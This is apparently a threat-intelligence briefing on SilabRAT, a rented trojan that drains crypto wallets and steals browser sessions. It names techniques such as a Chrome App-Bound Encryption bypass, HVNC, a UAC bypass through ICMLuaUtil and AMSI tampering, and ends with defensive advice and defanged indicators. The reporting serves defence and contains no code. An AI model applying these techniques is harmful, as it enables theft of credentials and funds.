Researchers at Group-IB have detailed SilabRAT, a new remote access trojan rented out as a subscription service that is built to empty cryptocurrency wallets and steal browser logins, and it is already being used in live attacks. The tool costs 5,000 dollars a month and is the work of a Russian-speaking developer who goes by the handle o1oo1, according to the original report.
Sold on Russian-language crime forums (Exploit, XSS, WWH, and the now-defunct RAMP) since at least September 2025, SilabRAT follows an operator-hosted model: each buyer runs their own command-and-control server, so the seller never sees victim data. One customer claimed that more than 90 percent of infected machines stayed online across a month-long campaign. Group-IB observed the malware delivered through email spam and ClickFix lures, a social-engineering trick that tells the victim to paste a malicious command into a Windows dialog.
What it can do
SilabRAT is focused on financial theft. Its AutoWallet module quietly tries to crack the passwords on any crypto wallet it finds, reusing passwords harvested from the victim's browser. It also defeats Chrome App-Bound Encryption, the protection Google added in Chrome 127 to stop malware from reading saved cookies and passwords, by abusing a Chrome elevation service through a helper file named APPB.dll.
To get around modern login defenses, the malware does more than steal passwords. It clones the victim's browser profile, copying the fingerprint and stored sessions onto the attacker machine so that stolen sessions survive device and IP checks, effectively sidestepping multi-factor authentication. A Hidden VNC (HVNC) feature lets the operator control the machine invisibly, with no mouse movement or windows appearing on screen, so fraudulent logins and transfers look like they come from the real user. SilabRAT also bypasses Windows User Account Control through the ICMLuaUtil COM interface, tampers with the AMSI scanning feature to dodge antivirus, and keeps itself running through registry keys or scheduled tasks. Because the packer is widely flagged as HijackLoader, many engines miss the payload underneath. Group-IB notes that o1oo1 plans to add code injection aimed at Electron-based wallet apps such as Ledger and Trezor Suite.
What you should do
Group-IB recommends enforcing multi-factor authentication everywhere, filtering email and web traffic to block phishing and ClickFix pages, and treating any prompt that asks you to paste or run a command with suspicion. Keeping Chrome fully updated matters too, since the malware leans on a bypass of its encryption.
Defanged indicators from the report:
- SilabRAT payload (SHA-256): fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023
- APPB.dll, 64-bit (SHA-256): 3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b
- APPB.dll, 32-bit (SHA-256): fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623
- Target.dll (SHA-256): 79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5
- C2 server: 91[.]199[.]163[.]124
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.